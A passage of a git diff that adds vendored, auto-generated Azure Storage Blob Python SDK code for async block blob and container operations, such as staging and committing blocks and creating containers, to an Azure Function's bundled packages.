response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + put_blob_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def stage_block( # pylint: disable=inconsistent-return-statements + self, + block_id: str, + content_length: int, + body: IO, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + **kwargs: Any + ) -> None: + """The Stage Block operation creates a new block to be committed as part of a blob. + + :param block_id: A valid Base64 string value that identifies the block. Prior to encoding, the + string must be less than or equal to 64 bytes in size. For a given blob, the length of the + value specified for the blockid parameter must be the same size for each block. + :type block_id: str + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :keyword comp: comp. Default value is "block". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "block") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + _content = body + + request = build_stage_block_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + block_id=block_id, + content_length=content_length, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + request_id_parameter=request_id_parameter, + template_url=self.stage_block.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + stage_block.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def stage_block_from_url( # pylint: 
disable=inconsistent-return-statements + self, + block_id: str, + content_length: int, + source_url: str, + source_range: Optional[str] = None, + source_content_md5: Optional[bytearray] = None, + source_contentcrc64: Optional[bytearray] = None, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + copy_source_authorization: Optional[str] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Stage Block operation creates a new block to be committed as part of a blob where the + contents are read from a URL. + + :param block_id: A valid Base64 string value that identifies the block. Prior to encoding, the + string must be less than or equal to 64 bytes in size. For a given blob, the length of the + value specified for the blockid parameter must be the same size for each block. + :type block_id: str + :param content_length: The length of the request. + :type content_length: long + :param source_url: Specify a URL to the copy source. + :type source_url: str + :param source_range: Bytes of source data in the specified range. Default value is None. + :type source_range: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param source_contentcrc64: Specify the crc64 calculated for the range of bytes that must be + read from the copy source. Default value is None. + :type source_contentcrc64: bytearray + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword comp: comp. Default value is "block". Note that overriding this default value may + result in unsupported behavior. 
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "block") # type: str + + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _lease_id = None + _source_if_modified_since = None + _source_if_unmodified_since = None + _source_if_match = None + _source_if_none_match = None + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if source_modified_access_conditions is not None: + _source_if_modified_since = source_modified_access_conditions.source_if_modified_since + _source_if_unmodified_since = source_modified_access_conditions.source_if_unmodified_since + _source_if_match = source_modified_access_conditions.source_if_match + _source_if_none_match = source_modified_access_conditions.source_if_none_match + + request = build_stage_block_from_url_request( + url=self._config.url, + comp=comp, + version=self._config.version, + block_id=block_id, + content_length=content_length, + source_url=source_url, + source_range=source_range, + source_content_md5=source_content_md5, + source_contentcrc64=source_contentcrc64, + timeout=timeout, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + lease_id=_lease_id, + source_if_modified_since=_source_if_modified_since, + source_if_unmodified_since=_source_if_unmodified_since, + source_if_match=_source_if_match, + source_if_none_match=_source_if_none_match, + request_id_parameter=request_id_parameter, + copy_source_authorization=copy_source_authorization, + template_url=self.stage_block_from_url.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', 
response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + stage_block_from_url.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def commit_block_list( # pylint: disable=inconsistent-return-statements + self, + blocks: "_models.BlockLookupList", + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Commit Block List operation writes a blob by specifying the list of block IDs that make up + the blob. In order to be written as part of a blob, a block must have been successfully written + to the server in a prior Put Block operation. You can call Put Block List to update a blob by + uploading only those blocks that have changed, then committing the new and existing blocks + together. You can do this by specifying whether to commit a block from the committed block list + or from the uncommitted block list, or to commit the most recently uploaded version of the + block, whichever list it may belong to. + + :param blocks: Blob Blocks. + :type blocks: ~azure.storage.blob.models.BlockLookupList + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. 
+        :type metadata: dict[str, str]
+        :param tier: Optional. Indicates the tier to be set on the blob. Default value is None.
+        :type tier: str or ~azure.storage.blob.models.AccessTierOptional
+        :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character
+         limit that is recorded in the analytics logs when storage analytics logging is enabled. Default
+         value is None.
+        :type request_id_parameter: str
+        :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default
+         value is None.
+        :type blob_tags_string: str
+        :param immutability_policy_expiry: Specifies the date and time when the blob's immutability
+         policy is set to expire. Default value is None.
+        :type immutability_policy_expiry: ~datetime.datetime
+        :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob.
+         Default value is None.
+        :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode
+        :param legal_hold: Specifies whether a legal hold should be set on the blob. Default value is
+         None.
+        :type legal_hold: bool
+        :param blob_http_headers: Parameter group. Default value is None.
+        :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders
+        :param lease_access_conditions: Parameter group. Default value is None.
+        :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
+        :param cpk_info: Parameter group. Default value is None.
+        :type cpk_info: ~azure.storage.blob.models.CpkInfo
+        :param cpk_scope_info: Parameter group. Default value is None.
+        :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo
+        :param modified_access_conditions: Parameter group. Default value is None.
+        :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+        :keyword comp: comp. Default value is "blocklist". Note that overriding this default value may
+         result in unsupported behavior.
+ :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "blocklist") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _blob_cache_control = None + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_cache_control = blob_http_headers.blob_cache_control + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = self._serialize.body(blocks, 'BlockLookupList', is_xml=True) + + request = build_commit_block_list_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + blob_cache_control=_blob_cache_control, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.commit_block_list.metadata['url'], + ) + request = _convert_request(request) + request.url = 
self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + commit_block_list.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_block_list( + self, + snapshot: Optional[str] = None, + list_type: Union[str, "_models.BlockListType"] = "committed", + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> "_models.BlockList": + """The Get Block List operation retrieves the list of blocks that have been uploaded as part of a + block blob. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param list_type: Specifies whether to return the list of committed blocks, the list of + uncommitted blocks, or both lists together. Default value is "committed". + :type list_type: str or ~azure.storage.blob.models.BlockListType + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. 
Default value is None.
+        :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions
+        :param modified_access_conditions: Parameter group. Default value is None.
+        :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions
+        :keyword comp: comp. Default value is "blocklist". Note that overriding this default value may
+         result in unsupported behavior.
+        :paramtype comp: str
+        :keyword callable cls: A custom type or function that will be passed the direct response
+        :return: BlockList, or the result of cls(response)
+        :rtype: ~azure.storage.blob.models.BlockList
+        :raises: ~azure.core.exceptions.HttpResponseError
+        """
+        cls = kwargs.pop('cls', None)  # type: ClsType["_models.BlockList"]
+        error_map = {
+            401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
+        }
+        error_map.update(kwargs.pop('error_map', {}))
+
+        comp = kwargs.pop('comp', "blocklist")  # type: str
+
+        _lease_id = None
+        _if_tags = None
+        if lease_access_conditions is not None:
+            _lease_id = lease_access_conditions.lease_id
+        if modified_access_conditions is not None:
+            _if_tags = modified_access_conditions.if_tags
+
+        request = build_get_block_list_request(
+            url=self._config.url,
+            comp=comp,
+            version=self._config.version,
+            snapshot=snapshot,
+            list_type=list_type,
+            timeout=timeout,
+            lease_id=_lease_id,
+            if_tags=_if_tags,
+            request_id_parameter=request_id_parameter,
+            template_url=self.get_block_list.metadata['url'],
+        )
+        request = _convert_request(request)
+        request.url = self._client.format_url(request.url)
+
+        pipeline_response = await self._client._pipeline.run(  # pylint: disable=protected-access
+            request,
+            stream=False,
+            **kwargs
+        )
+        response = pipeline_response.http_response
+
+        if response.status_code not in [200]:
+            map_error(status_code=response.status_code, response=response, error_map=error_map)
+            error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response)
+            raise HttpResponseError(response=response, model=error)
+
+        response_headers = {}
+        response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified'))
+        response_headers['ETag']=self._deserialize('str', response.headers.get('ETag'))
+        response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type'))
+        response_headers['x-ms-blob-content-length']=self._deserialize('long', response.headers.get('x-ms-blob-content-length'))
+        response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id'))
+        response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id'))
+        response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version'))
+        response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date'))
+
+        deserialized = self._deserialize('BlockList', pipeline_response)
+
+        if cls:
+            return cls(pipeline_response, deserialized, response_headers)
+
+        return deserialized
+
+    get_block_list.metadata = {'url': "{url}/{containerName}/{blob}"}  # type: ignore
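+
+# Illustrative staged-upload sketch (not generated code). It exercises the
+# stage_block/commit_block_list/get_block_list operations above via the public
+# wrapper; `blob` is assumed to be an authenticated
+# azure.storage.blob.aio.BlobClient.
+#
+#     import uuid
+#     from azure.storage.blob import BlobBlock
+#
+#     block_id = str(uuid.uuid4())
+#     await blob.stage_block(block_id, b"first chunk")        # -> stage_block
+#     await blob.commit_block_list([BlobBlock(block_id)])     # -> commit_block_list
+#     committed, _ = await blob.get_block_list("all")         # -> get_block_list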
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_container_operations.py @@ -0,0 +1,1792 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +from typing import Any, Callable, Dict, IO, List, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._container_operations import build_acquire_lease_request, build_break_lease_request, build_change_lease_request, build_create_request, build_delete_request, build_filter_blobs_request, build_get_access_policy_request, build_get_account_info_request, build_get_properties_request, build_list_blob_flat_segment_request, build_list_blob_hierarchy_segment_request, build_release_lease_request, build_rename_request, build_renew_lease_request, build_restore_request, build_set_access_policy_request, build_set_metadata_request, build_submit_batch_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class ContainerOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`container` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def create( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + metadata: Optional[Dict[str, str]] = None, + access: Optional[Union[str, "_models.PublicAccessType"]] = None, + request_id_parameter: Optional[str] = None, + container_cpk_scope_info: Optional["_models.ContainerCpkScopeInfo"] = None, + **kwargs: Any + ) -> None: + """creates a new container under the specified account. If the container with the same name + already exists, the operation fails. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. 
If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param access: Specifies whether data in the container may be accessed publicly and the level + of access. Default value is None. + :type access: str or ~azure.storage.blob.models.PublicAccessType + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param container_cpk_scope_info: Parameter group. Default value is None. + :type container_cpk_scope_info: ~azure.storage.blob.models.ContainerCpkScopeInfo + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _default_encryption_scope = None + _prevent_encryption_scope_override = None + if container_cpk_scope_info is not None: + _default_encryption_scope = container_cpk_scope_info.default_encryption_scope + _prevent_encryption_scope_override = container_cpk_scope_info.prevent_encryption_scope_override + + request = build_create_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + metadata=metadata, + access=access, + request_id_parameter=request_id_parameter, + default_encryption_scope=_default_encryption_scope, + prevent_encryption_scope_override=_prevent_encryption_scope_override, + template_url=self.create.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return 
cls(pipeline_response, None, response_headers) + + create.metadata = {'url': "{url}/{containerName}"} # type: ignore + + + @distributed_trace_async + async def get_properties( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """returns all user-defined metadata and system properties for the specified container. The data + returned does not include the container's list of blobs. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword restype: restype. Default value is "container". Note that overriding this default + value may result in unsupported behavior. + :paramtype restype: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + restype = kwargs.pop('restype', "container") # type: str + + _lease_id = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_properties_request( + url=self._config.url, + restype=restype, + version=self._config.version, + timeout=timeout, + lease_id=_lease_id, + request_id_parameter=request_id_parameter, + template_url=self.get_properties.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = 